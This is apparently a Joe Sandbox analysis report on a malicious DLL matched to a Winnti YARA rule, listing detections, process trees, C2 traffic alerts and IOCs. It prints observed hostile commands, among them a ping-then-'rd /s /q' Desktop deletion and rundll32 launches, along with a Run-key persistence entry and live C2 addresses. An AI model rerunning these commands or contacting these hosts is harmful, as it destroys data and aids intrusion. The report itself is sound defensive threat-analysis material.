Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QCTYoyX422.dll

Overview

General Information

Sample name:QCTYoyX422.dll
renamed because original name is a hash value
Original sample name:78131997ac3542a3ce1c2ae4afac1474ba0a19cb.dll
Analysis ID:1578323
MD5:d32fca080e7b321914810ff69eafd1a4
SHA1:78131997ac3542a3ce1c2ae4afac1474ba0a19cb
SHA256:2281a8837520789fed9c41a66d241a8cf85b83085da2b0fe0f8408e49bde8cef
Tags:dlluser-NDA0E
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
PE file has a writeable .text section
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6692 cmdline: loaddll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3576 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6156 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 4416 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 2968 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 5400 cmdline: rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6776 cmdline: rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3852 cmdline: rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6360 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 2360 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5912 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 1268 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3780 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 1568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 4512 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 612 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5900 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 2164 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 6640 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1888 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
QCTYoyX422.dllWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo

Unpacked PEs

SourceRuleDescriptionAuthorStrings
3.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo
10.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo
17.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo

Sigma Signatures

System Summary

barindex
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dtfd

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:33:49.117775+010028032742Potentially Bad Traffic192.168.2.549832116.133.8.9280TCP
2024-12-19T15:33:53.576147+010028032742Potentially Bad Traffic192.168.2.549860116.133.8.9280TCP
2024-12-19T15:33:56.329824+010028032742Potentially Bad Traffic192.168.2.549899116.133.8.9280TCP
2024-12-19T15:34:01.922308+010028032742Potentially Bad Traffic192.168.2.549944116.133.8.9280TCP
2024-12-19T15:34:03.882293+010028032742Potentially Bad Traffic192.168.2.549983116.133.8.9280TCP
2024-12-19T15:34:07.901128+010028032742Potentially Bad Traffic192.168.2.550029116.133.8.9280TCP
2024-12-19T15:34:11.998149+010028032742Potentially Bad Traffic192.168.2.550073116.133.8.9280TCP
2024-12-19T15:34:16.124537+010028032742Potentially Bad Traffic192.168.2.550124116.133.8.9280TCP
2024-12-19T15:34:20.060517+010028032742Potentially Bad Traffic192.168.2.550169116.133.8.9280TCP
2024-12-19T15:34:26.235546+010028032742Potentially Bad Traffic192.168.2.550211116.133.8.9280TCP
2024-12-19T15:34:28.300492+010028032742Potentially Bad Traffic192.168.2.550261116.133.8.9280TCP
2024-12-19T15:34:32.273166+010028032742Potentially Bad Traffic192.168.2.550312116.133.8.9280TCP
2024-12-19T15:34:37.014304+010028032742Potentially Bad Traffic192.168.2.550373116.133.8.9280TCP
2024-12-19T15:34:40.492801+010028032742Potentially Bad Traffic192.168.2.550442116.133.8.9280TCP
2024-12-19T15:34:44.460965+010028032742Potentially Bad Traffic192.168.2.550514116.133.8.9280TCP
2024-12-19T15:34:50.548218+010028032742Potentially Bad Traffic192.168.2.550599116.133.8.9280TCP
2024-12-19T15:34:54.563154+010028032742Potentially Bad Traffic192.168.2.550694116.133.8.9280TCP
2024-12-19T15:34:58.581797+010028032742Potentially Bad Traffic192.168.2.550821116.133.8.9280TCP
2024-12-19T15:35:00.531712+010028032742Potentially Bad Traffic192.168.2.550968116.133.8.9280TCP
2024-12-19T15:35:04.602169+010028032742Potentially Bad Traffic192.168.2.551159116.133.8.9280TCP
2024-12-19T15:35:08.945512+010028032742Potentially Bad Traffic192.168.2.551338116.133.8.9280TCP
2024-12-19T15:35:13.774372+010028032742Potentially Bad Traffic192.168.2.551564116.133.8.9280TCP
2024-12-19T15:35:17.090682+010028032742Potentially Bad Traffic192.168.2.551811116.133.8.9280TCP
2024-12-19T15:35:22.454987+010028032742Potentially Bad Traffic192.168.2.553337116.133.8.9280TCP
2024-12-19T15:35:25.922944+010028032742Potentially Bad Traffic192.168.2.555397116.133.8.9280TCP
2024-12-19T15:35:29.752186+010028032742Potentially Bad Traffic192.168.2.558026116.133.8.9280TCP
2024-12-19T15:35:35.720398+010028032742Potentially Bad Traffic192.168.2.559713116.133.8.9280TCP
2024-12-19T15:35:37.694973+010028032742Potentially Bad Traffic192.168.2.562269116.133.8.9280TCP
2024-12-19T15:35:39.876748+010028032742Potentially Bad Traffic192.168.2.564965116.133.8.9280TCP
2024-12-19T15:35:41.869054+010028032742Potentially Bad Traffic192.168.2.565117116.133.8.9280TCP
2024-12-19T15:35:45.970804+010028032742Potentially Bad Traffic192.168.2.551145116.133.8.9280TCP
2024-12-19T15:35:50.736803+010028032742Potentially Bad Traffic192.168.2.553691116.133.8.9280TCP
2024-12-19T15:35:56.157102+010028032742Potentially Bad Traffic192.168.2.555835116.133.8.9280TCP
2024-12-19T15:35:58.175529+010028032742Potentially Bad Traffic192.168.2.558043116.133.8.9280TCP
2024-12-19T15:36:03.560201+010028032742Potentially Bad Traffic192.168.2.561064116.133.8.9280TCP
2024-12-19T15:36:08.443719+010028032742Potentially Bad Traffic192.168.2.562823116.133.8.9280TCP
2024-12-19T15:36:11.079166+010028032742Potentially Bad Traffic192.168.2.549190116.133.8.9280TCP
2024-12-19T15:36:14.682367+010028032742Potentially Bad Traffic192.168.2.551417116.133.8.9280TCP
2024-12-19T15:36:20.614467+010028032742Potentially Bad Traffic192.168.2.552994116.133.8.9280TCP
2024-12-19T15:36:24.626595+010028032742Potentially Bad Traffic192.168.2.555604116.133.8.9280TCP
2024-12-19T15:36:26.715575+010028032742Potentially Bad Traffic192.168.2.557901116.133.8.9280TCP
2024-12-19T15:36:30.697075+010028032742Potentially Bad Traffic192.168.2.560362116.133.8.9280TCP
2024-12-19T15:36:36.083800+010028032742Potentially Bad Traffic192.168.2.563422116.133.8.9280TCP
2024-12-19T15:36:38.041832+010028032742Potentially Bad Traffic192.168.2.564310116.133.8.9280TCP
2024-12-19T15:36:42.322679+010028032742Potentially Bad Traffic192.168.2.550407116.133.8.9280TCP
2024-12-19T15:36:47.818287+010028032742Potentially Bad Traffic192.168.2.553368116.133.8.9280TCP
2024-12-19T15:36:50.547672+010028032742Potentially Bad Traffic192.168.2.554824116.133.8.9280TCP
2024-12-19T15:36:54.669045+010028032742Potentially Bad Traffic192.168.2.556892116.133.8.9280TCP
2024-12-19T15:36:58.732633+010028032742Potentially Bad Traffic192.168.2.559314116.133.8.9280TCP
2024-12-19T15:37:04.474074+010028032742Potentially Bad Traffic192.168.2.562377116.133.8.9280TCP
2024-12-19T15:37:06.983025+010028032742Potentially Bad Traffic192.168.2.563810116.133.8.9280TCP
2024-12-19T15:37:09.575587+010028032742Potentially Bad Traffic192.168.2.564717116.133.8.9280TCP
2024-12-19T15:37:15.635195+010028032742Potentially Bad Traffic192.168.2.551632116.133.8.9280TCP
2024-12-19T15:37:18.875742+010028032742Potentially Bad Traffic192.168.2.552689116.133.8.9280TCP
2024-12-19T15:37:22.180429+010028032742Potentially Bad Traffic192.168.2.553533116.133.8.9280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:33:39.327074+010028032702Potentially Bad Traffic192.168.2.549718107.160.131.25318659TCP
2024-12-19T15:33:45.397452+010028032702Potentially Bad Traffic192.168.2.549719107.163.56.11018530TCP
2024-12-19T15:33:45.397574+010028032702Potentially Bad Traffic192.168.2.549792107.160.131.25423588TCP
2024-12-19T15:33:45.397604+010028032702Potentially Bad Traffic192.168.2.549794107.160.131.25423588TCP
2024-12-19T15:33:49.522293+010028032702Potentially Bad Traffic192.168.2.549814107.160.131.25423588TCP
2024-12-19T15:33:49.522365+010028032702Potentially Bad Traffic192.168.2.549815107.160.131.25423588TCP
2024-12-19T15:33:53.576110+010028032702Potentially Bad Traffic192.168.2.549859107.160.131.25423588TCP
2024-12-19T15:33:53.576176+010028032702Potentially Bad Traffic192.168.2.549857107.160.131.25423588TCP
2024-12-19T15:33:57.708282+010028032702Potentially Bad Traffic192.168.2.549900107.160.131.25423588TCP
2024-12-19T15:33:57.708363+010028032702Potentially Bad Traffic192.168.2.549897107.160.131.25423588TCP
2024-12-19T15:34:01.922280+010028032702Potentially Bad Traffic192.168.2.549943107.160.131.25423588TCP
2024-12-19T15:34:01.922315+010028032702Potentially Bad Traffic192.168.2.549938107.160.131.25423588TCP
2024-12-19T15:34:05.938341+010028032702Potentially Bad Traffic192.168.2.549982107.160.131.25423588TCP
2024-12-19T15:34:05.938912+010028032702Potentially Bad Traffic192.168.2.549980107.160.131.25423588TCP
2024-12-19T15:34:09.938157+010028032702Potentially Bad Traffic192.168.2.550028107.160.131.25423588TCP
2024-12-19T15:34:09.938193+010028032702Potentially Bad Traffic192.168.2.550026107.160.131.25423588TCP
2024-12-19T15:34:14.078380+010028032702Potentially Bad Traffic192.168.2.550072107.160.131.25423588TCP
2024-12-19T15:34:14.078461+010028032702Potentially Bad Traffic192.168.2.550074107.160.131.25423588TCP
2024-12-19T15:34:18.094296+010028032702Potentially Bad Traffic192.168.2.550123107.160.131.25423588TCP
2024-12-19T15:34:18.094296+010028032702Potentially Bad Traffic192.168.2.550121107.160.131.25423588TCP
2024-12-19T15:34:22.219354+010028032702Potentially Bad Traffic192.168.2.550166107.160.131.25423588TCP
2024-12-19T15:34:22.219408+010028032702Potentially Bad Traffic192.168.2.550168107.160.131.25423588TCP
2024-12-19T15:34:26.235588+010028032702Potentially Bad Traffic192.168.2.550210107.160.131.25423588TCP
2024-12-19T15:34:26.235589+010028032702Potentially Bad Traffic192.168.2.550208107.160.131.25423588TCP
2024-12-19T15:34:30.260068+010028032702Potentially Bad Traffic192.168.2.550256107.160.131.25423588TCP
2024-12-19T15:34:30.260102+010028032702Potentially Bad Traffic192.168.2.550260107.160.131.25423588TCP
2024-12-19T15:34:34.390927+010028032702Potentially Bad Traffic192.168.2.550311107.160.131.25423588TCP
2024-12-19T15:34:34.391007+010028032702Potentially Bad Traffic192.168.2.550308107.160.131.25423588TCP
2024-12-19T15:34:38.517665+010028032702Potentially Bad Traffic192.168.2.550374107.160.131.25423588TCP
2024-12-19T15:34:38.518078+010028032702Potentially Bad Traffic192.168.2.550371107.160.131.25423588TCP
2024-12-19T15:34:42.517559+010028032702Potentially Bad Traffic192.168.2.550443107.160.131.25423588TCP
2024-12-19T15:34:42.517591+010028032702Potentially Bad Traffic192.168.2.550436107.160.131.25423588TCP
2024-12-19T15:34:46.532733+010028032702Potentially Bad Traffic192.168.2.550515107.160.131.25423588TCP
2024-12-19T15:34:46.532789+010028032702Potentially Bad Traffic192.168.2.550510107.160.131.25423588TCP
2024-12-19T15:34:50.548185+010028032702Potentially Bad Traffic192.168.2.550597107.160.131.25423588TCP
2024-12-19T15:34:50.548231+010028032702Potentially Bad Traffic192.168.2.550600107.160.131.25423588TCP
2024-12-19T15:34:54.563201+010028032702Potentially Bad Traffic192.168.2.550690107.160.131.25423588TCP
2024-12-19T15:34:54.563221+010028032702Potentially Bad Traffic192.168.2.550692107.160.131.25423588TCP
2024-12-19T15:34:58.581718+010028032702Potentially Bad Traffic192.168.2.550815107.160.131.25423588TCP
2024-12-19T15:34:58.581765+010028032702Potentially Bad Traffic192.168.2.550820107.160.131.25423588TCP
2024-12-19T15:35:02.594584+010028032702Potentially Bad Traffic192.168.2.550967107.160.131.25423588TCP
2024-12-19T15:35:02.594994+010028032702Potentially Bad Traffic192.168.2.550962107.160.131.25423588TCP
2024-12-19T15:35:06.840239+010028032702Potentially Bad Traffic192.168.2.551158107.160.131.25423588TCP
2024-12-19T15:35:06.840273+010028032702Potentially Bad Traffic192.168.2.551148107.160.131.25423588TCP
2024-12-19T15:35:10.989053+010028032702Potentially Bad Traffic192.168.2.551331107.160.131.25423588TCP
2024-12-19T15:35:10.989135+010028032702Potentially Bad Traffic192.168.2.551337107.160.131.25423588TCP
2024-12-19T15:35:15.141197+010028032702Potentially Bad Traffic192.168.2.551553107.160.131.25423588TCP
2024-12-19T15:35:15.141198+010028032702Potentially Bad Traffic192.168.2.551561107.160.131.25423588TCP
2024-12-19T15:35:19.164022+010028032702Potentially Bad Traffic192.168.2.551803107.160.131.25423588TCP
2024-12-19T15:35:19.164053+010028032702Potentially Bad Traffic192.168.2.551810107.160.131.25423588TCP
2024-12-19T15:35:23.313500+010028032702Potentially Bad Traffic192.168.2.552999107.160.131.25423588TCP
2024-12-19T15:35:23.313524+010028032702Potentially Bad Traffic192.168.2.552806107.160.131.25423588TCP
2024-12-19T15:35:27.461328+010028032702Potentially Bad Traffic192.168.2.555398107.160.131.25423588TCP
2024-12-19T15:35:27.461551+010028032702Potentially Bad Traffic192.168.2.555399107.160.131.25423588TCP
2024-12-19T15:35:31.719758+010028032702Potentially Bad Traffic192.168.2.558021107.160.131.25423588TCP
2024-12-19T15:35:31.721035+010028032702Potentially Bad Traffic192.168.2.558024107.160.131.25423588TCP
2024-12-19T15:35:35.720361+010028032702Potentially Bad Traffic192.168.2.559600107.160.131.25423588TCP
2024-12-19T15:35:35.720432+010028032702Potentially Bad Traffic192.168.2.559752107.160.131.25423588TCP
2024-12-19T15:35:39.876631+010028032702Potentially Bad Traffic192.168.2.562271107.160.131.25423588TCP
2024-12-19T15:35:39.876738+010028032702Potentially Bad Traffic192.168.2.562270107.160.131.25423588TCP
2024-12-19T15:35:44.001026+010028032702Potentially Bad Traffic192.168.2.565081107.160.131.25423588TCP
2024-12-19T15:35:44.001126+010028032702Potentially Bad Traffic192.168.2.565116107.160.131.25423588TCP
2024-12-19T15:35:48.126628+010028032702Potentially Bad Traffic192.168.2.551043107.160.131.25423588TCP
2024-12-19T15:35:48.126659+010028032702Potentially Bad Traffic192.168.2.551144107.160.131.25423588TCP
2024-12-19T15:35:52.142027+010028032702Potentially Bad Traffic192.168.2.553692107.160.131.25423588TCP
2024-12-19T15:35:52.142064+010028032702Potentially Bad Traffic192.168.2.553634107.160.131.25423588TCP
2024-12-19T15:35:56.157493+010028032702Potentially Bad Traffic192.168.2.555836107.160.131.25423588TCP
2024-12-19T15:35:56.157932+010028032702Potentially Bad Traffic192.168.2.555778107.160.131.25423588TCP
2024-12-19T15:36:00.173328+010028032702Potentially Bad Traffic192.168.2.558045107.160.131.25423588TCP
2024-12-19T15:36:00.173372+010028032702Potentially Bad Traffic192.168.2.557965107.160.131.25423588TCP
2024-12-19T15:36:04.297888+010028032702Potentially Bad Traffic192.168.2.560319107.160.131.25423588TCP
2024-12-19T15:36:04.297917+010028032702Potentially Bad Traffic192.168.2.560345107.160.131.25423588TCP
2024-12-19T15:36:08.443784+010028032702Potentially Bad Traffic192.168.2.562825107.160.131.25423588TCP
2024-12-19T15:36:08.443812+010028032702Potentially Bad Traffic192.168.2.562729107.160.131.25423588TCP
2024-12-19T15:36:12.579717+010028032702Potentially Bad Traffic192.168.2.549177107.160.131.25423588TCP
2024-12-19T15:36:12.579718+010028032702Potentially Bad Traffic192.168.2.549188107.160.131.25423588TCP
2024-12-19T15:36:16.595175+010028032702Potentially Bad Traffic192.168.2.551340107.160.131.25423588TCP
2024-12-19T15:36:16.595345+010028032702Potentially Bad Traffic192.168.2.551418107.160.131.25423588TCP
2024-12-19T15:36:20.614490+010028032702Potentially Bad Traffic192.168.2.552993107.160.131.25423588TCP
2024-12-19T15:36:20.614529+010028032702Potentially Bad Traffic192.168.2.552889107.160.131.25423588TCP
2024-12-19T15:36:24.626516+010028032702Potentially Bad Traffic192.168.2.555567107.160.131.25423588TCP
2024-12-19T15:36:24.626567+010028032702Potentially Bad Traffic192.168.2.555602107.160.131.25423588TCP
2024-12-19T15:36:28.642235+010028032702Potentially Bad Traffic192.168.2.557794107.160.131.25423588TCP
2024-12-19T15:36:28.642269+010028032702Potentially Bad Traffic192.168.2.557903107.160.131.25423588TCP
2024-12-19T15:36:32.676772+010028032702Potentially Bad Traffic192.168.2.560361107.160.131.25423588TCP
2024-12-19T15:36:32.676811+010028032702Potentially Bad Traffic192.168.2.560254107.160.131.25423588TCP
2024-12-19T15:36:36.083749+010028032702Potentially Bad Traffic192.168.2.562635107.160.131.25423588TCP
2024-12-19T15:36:36.083794+010028032702Potentially Bad Traffic192.168.2.562667107.160.131.25423588TCP
2024-12-19T15:36:40.204175+010028032702Potentially Bad Traffic192.168.2.564311107.160.131.25423588TCP
2024-12-19T15:36:40.204221+010028032702Potentially Bad Traffic192.168.2.564313107.160.131.25423588TCP
2024-12-19T15:36:44.220151+010028032702Potentially Bad Traffic192.168.2.550408107.160.131.25423588TCP
2024-12-19T15:36:44.220250+010028032702Potentially Bad Traffic192.168.2.550290107.160.131.25423588TCP
2024-12-19T15:36:48.433843+010028032702Potentially Bad Traffic192.168.2.552832107.160.131.25423588TCP
2024-12-19T15:36:48.433898+010028032702Potentially Bad Traffic192.168.2.552878107.160.131.25423588TCP
2024-12-19T15:36:52.594920+010028032702Potentially Bad Traffic192.168.2.554823107.160.131.25423588TCP
2024-12-19T15:36:52.595139+010028032702Potentially Bad Traffic192.168.2.554804107.160.131.25423588TCP
2024-12-19T15:36:56.749020+010028032702Potentially Bad Traffic192.168.2.556890107.160.131.25423588TCP
2024-12-19T15:36:56.749142+010028032702Potentially Bad Traffic192.168.2.556893107.160.131.25423588TCP
2024-12-19T15:37:00.876747+010028032702Potentially Bad Traffic192.168.2.559231107.160.131.25423588TCP
2024-12-19T15:37:00.876781+010028032702Potentially Bad Traffic192.168.2.559313107.160.131.25423588TCP
2024-12-19T15:37:05.001203+010028032702Potentially Bad Traffic192.168.2.562045107.160.131.25423588TCP
2024-12-19T15:37:05.001270+010028032702Potentially Bad Traffic192.168.2.561952107.160.131.25423588TCP
2024-12-19T15:37:07.518667+010028032702Potentially Bad Traffic192.168.2.563790107.160.131.25423588TCP
2024-12-19T15:37:07.518717+010028032702Potentially Bad Traffic192.168.2.563809107.160.131.25423588TCP
2024-12-19T15:37:11.642377+010028032702Potentially Bad Traffic192.168.2.564715107.160.131.25423588TCP
2024-12-19T15:37:11.642579+010028032702Potentially Bad Traffic192.168.2.564718107.160.131.25423588TCP
2024-12-19T15:37:15.818984+010028032702Potentially Bad Traffic192.168.2.550608107.160.131.25423588TCP
2024-12-19T15:37:15.819027+010028032702Potentially Bad Traffic192.168.2.550543107.160.131.25423588TCP
2024-12-19T15:37:20.197833+010028032702Potentially Bad Traffic192.168.2.552688107.160.131.25423588TCP
2024-12-19T15:37:20.197840+010028032702Potentially Bad Traffic192.168.2.552686107.160.131.25423588TCP
2024-12-19T15:37:42.238712+010028032702Potentially Bad Traffic192.168.2.553487107.160.131.25423588TCP
2024-12-19T15:37:42.379327+010028032702Potentially Bad Traffic192.168.2.553534107.160.131.25423588TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:33:39.327074+010028124071Malware Command and Control Activity Detected192.168.2.549718107.160.131.25318659TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: QCTYoyX422.dllAvira: detected
Multi AV Scanner detection for submitted file
Source: QCTYoyX422.dllReversingLabs: Detection: 78%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: QCTYoyX422.dllJoe Sandbox ML: detected
Source: QCTYoyX422.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:58988 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:63631 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:49565 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:52236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:59311 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:61403 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51650 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:60620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:49251 version: TLS 1.2
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507225694.0000000002791000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507250715.000000000278B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.*\*.* source: rundll32.exe, 00000003.00000003.4481849158.000000000276E000.00000004.00000020.00020000.00000000.sdmp
